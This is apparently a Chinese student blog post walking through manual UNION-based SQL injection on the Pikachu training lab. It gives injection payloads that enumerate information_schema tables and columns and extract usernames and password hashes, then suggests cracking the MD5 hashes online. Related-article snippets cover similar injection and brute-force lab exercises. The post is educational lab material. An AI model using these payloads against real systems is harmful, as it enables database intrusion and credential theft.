实验11:information_schema注入

最新推荐文章于 2023-04-08 16:51:23 发布
最新推荐文章于 2023-04-08 16:51:23 发布
阅读量257 收藏 2
点赞数
分类专栏: 作业
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44720671/article/details/88937505
版权

information_schema注入

本章是将之前所学的知识融合到一起,进行综合注入
以Pikachu为例,打开字符型注入
在这里插入图片描述

步骤如下:

1、测试是否为注入点
有很多种方法,可以使用工具,或者手工测试,例如输入一个”单引号“
在这里插入图片描述
报错显示到前端,可以进行下一项
2、看有几个字段
使用order by句式来试探
例:hello‘ order by 2#
在这里插入图片描述
表明有两行字段
3、联合查询
①查询表名:例:hello’ union select table_schema,table_name from information_schema.tables where table_schema=‘pikachu’#
在这里插入图片描述
②查询字段名
例:hello’ union select table_name,column_name from information_schema.columns where table_name=‘users’#
得到:
在这里插入图片描述
得到这些信息后,我们很容易就能得到关键的用户名和密码
例:hello’ union select username,password from users#
如图:


此时密码是经过md5加密的,我们可以在网上搜索MD5解密工具,获取真正的密码。

以菜之名
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
information_schema注入
北冥有鱼
03-30 4951
上一篇文章提到过,information_schema是mysql自带的一个表,这个表里存放了大量信息。 我们可以进去这个数据库简单的看一下 然后输入 show tables, 能看到这里面有很多的表,我们先来看一下tables这个表 可以发现这里面有很多的字段,这些字段包含了这个数据库的名称,这个数据库里的表的名称,表的类型,默认的引擎,版本等等。。这些东西,都会放到这个表里面 还有一...
informaton_schema注入
weixin_44720762的博客
04-06 202
在开始schema注入之前,首先对information-schema做一些简单的介绍,一下的信息来源于百度文库查询,读者可以直接从百度问库查找到更详细的information-schema介绍。 schemata表: 这里面包括数据库的名称,版本。 tables表: 具体表中的内容显示如下 columns表: 表中具体内容显示如下 除了以上的表以外,information-schema中还有许...
Information_Schema注入
qq_45680080的博客
11-02 309
Information_Schema注入 information_schema简单介绍: 打开MySQL数据库——在第二行mysql>处输入show databases(查看在MySQL上的数据库)——在第二行mysql>输入use information_schema;——进入之后在第四行mysql>输入show tables(查看该数据库的表格)——在第三行mysql>...
Sql注入前置知识之information_schema数据库
BetsyMyGirl的博客
11-30 1386
概述 Mysql5.0以上, Mysql自带了Information_schema这个数据库, 5.0以下是没有的,information_schema 数据库跟 performance_schema 一样,都是 MySQL 自带的信息数据库。其中 performance_schema 用于性能分析,而 information_schema 用于存储数据库元数据(关于数据的数据),例如数据库名、表名、列的数据类型、访问权限等。 实际运用 select table_name from information_
trafaret_schema:json_schema转换为Trafaret
05-08
from trafaret_schema import json_schema check_string = json_schema({'type': 'string', 'minLength': 6, 'maxLength': 10, 'pattern': '(bla)+'}) check_string('blablabla') 需要注意的重要一点是,该库是产生...
解析MySQL的information_schema数据库
09-10
MySQL的information_schema数据库是一个非常重要的工具,用于获取关于MySQL服务器中的元数据,即数据库、表、列、索引、权限等对象的相关信息。这个数据库在MySQL 5.0版本之后被引入,它不是一个实际存在的物理...
探讨SQL利用INFORMATION_SCHEMA系统视图如何获取表的主外键信息
09-10
本文将详细讲解如何利用`INFORMATION_SCHEMA`系统视图来完成这一工作。 `INFORMATION_SCHEMA`是SQL标准提供的一组视图,它提供了关于数据库模式对象(如表、列、索引等)的元数据信息。在大多数现代SQL数据库系统中...
information_schema数据库在SQL注入中的应用.docx
06-11
在 SQL 注入攻击中,information_schema 数据库中的这三张表扮演着关键的角色。攻击者可以通过查询这些表来获取数据库、表和字段的信息,从而实现 SQL 注入攻击。因此,在防止 SQL 注入攻击时,需要对信息架构数据库...
渗透测试-地基篇-数据库-IFORMATION_SCHEMA 详解(五)
qq_34801745的博客
11-17 776
** 渗透测试-地基篇-数据库-IFORMATION_SCHEMA 详解(五) ** 作者:大余 时间:2020-11-17 简介: 渗透测试-地基篇: 该篇章目的是重新牢固地基,加强每日训练操作的笔记,在记录地基笔记中会有很多跳跃性思维的操作和方式方法,望大家能共同加油学到东西。 请注意: 对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,我概不负责。 名言: 你对这
mysql注入information_mysql手注入information_schema数据库详解
weixin_35659005的博客
02-03 415
一、作为一个半道出家的萌新,深知在二、MySQL知己知彼,百战不殆,要想玩好SQL注入必须了解1、库(database):MySQL图书馆:而在数据库中它是这样的:2、表(table):表可以理解为存在于库中的二级目录,接上例子:类似于图书馆里的的书架,一个书架就是一个表,书架上贴的分类标签就是表名。书架:而在数据库中是这样的:3、列(column):列是存在于表中的目录,一个表中存在一个或多个列...
SQL注入之——union以及information_schema手工注入
温柔小薛的博客
04-02 1174
SQL注入之union以及information_schema手工注入 目录SQL注入之union以及information_schema手工注入union 注入确认字段个数使用union针对查出来的字段数做一个SQL语句拼接information_schema 注入先通过之前的union先找出数据库的名称获取pikachu数据库的表名获取 pikachu 数据库的字段名最后获取敏感字段值的内容 ...
张小白的渗透之路(六)——SQL注入的思路、流程及SQL的CONCAT系列函数、Information_schema数据库讲解
Litbai_zhang
10-31 2015
前言 关于SQL注入理论的内容,小白之前的博客有写,有兴趣的可以去看一看哦~SQL注入原理详解 实践 ps: 实验的环境小白用的sqli-labs的第一关,下面让我们开始吧 第一关呢提示我们可以用数字型的注入就可以过啦 我们在url输入 ?id=1 结果显示通关啦 当然,小白的目的不是写通关攻略,所以接下来让我们继续以这个例子来更深入的理解一下SQL注入的思路。 那么比方说我现在想获取的是数...
SQL注入.系统数据库information_schema
newlife1441的博客
08-06 449
mysql的系统数据库information_schema中,经常利用系统数据库配合union联合查询来获取数据库相关信息,因为系统数据库中所有信息都在这个数据库里面,常常被利用的表有TABLES以及存放列相关信息的COLUMNS、还有数据库相关信息的SCHEMATA表📔📓。...
mysql 注入 information_schema_SQL注入information_schema的利用
weixin_32287563的博客
02-27 502
SQL注入中经常会碰到 PHP + MySQL 的情况,此时可以尝试通过 INFORMATION_SCHEMA 库来查询想要的信息。0x01 在 MySQL 的注入中,通常用 --+ 和 # 这两种注释符号来注释后面的语句,但是在 URL 中使用 # 会被当做 URL 的锚点不起作用,所以在使用 # 注释符时需要将其编码为 23%。0x02 通过 information_schema 数据库查询 ...
N10-sql注入information_schema注入
尐猴子君ii的博客
04-01 1588
同样采用union的联合语句,去查询数据库默认创建的Information_schema的数据库,这个数据库是记录数据库所有参数数据的。所以,我们可以尝试使用字符型注入的闭合语句去查询。 首先输入一个’,发现返回的是错误语句,说明我们输入的内容是拼接到数据库里的。 然后重复字符型和union章节的操作,我们可以查询到很多关于网站数据库的信息,包括数据库名等。 然后我来看这条 例句: SELECT...
sql注入information_schema数据库)
qq_43814486的博客
03-31 2915
1.union语句 该语句可以使两个语句联合起来,但是该语句有一个前提,就是union后边跟的字段数必须要和前面对应,也就是说要知道前面的字段个数,然后对应上,这里可以用order by,错误的话会出现类似以下样子,说明没有第四字段。 这时候再试试三: 他就不会有报错,说明有三个字段,所以就可以用 union select 自己想要的东西了,比如user(),database(),versio...
pikachu靶场通关(上)
qq_65950075的博客
04-08 825
第一关:暴力破解1.1基于表单的暴力破解首先打开burp suite拦截,然后在随意输入账号密码,可在burpsuite上抓到皮卡丘的包,可以看到刚才输入的账号密码我们选择放包,然后看到提示“用户名或密码不存在”,说明刚刚随便输入的账号密码是错的(废话)这怎么办呢,可以看到右上角有提示,我们点开发现三个账号密码,其中肯定有一个是正确的,当然我们可以一个一个地试。但是数量多的话我们就不好试了。把这三个记下来,下面用到。再次随便输入账号密码,拦截抓包发送攻击类型选择集束炸弹。
#n:information_schema !<md> [null, 0, null, null, -2147483648, -2147483648]
最新发布
05-25
`information_schema` 是 MySQL 数据库中的一个数据库,它包含了关于数据库、表、列、函数等各种元数据(metadata)信息的视图(view)。这些视图可以通过 SQL 查询来获取相关的信息,例如表的结构、数据类型、约束...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值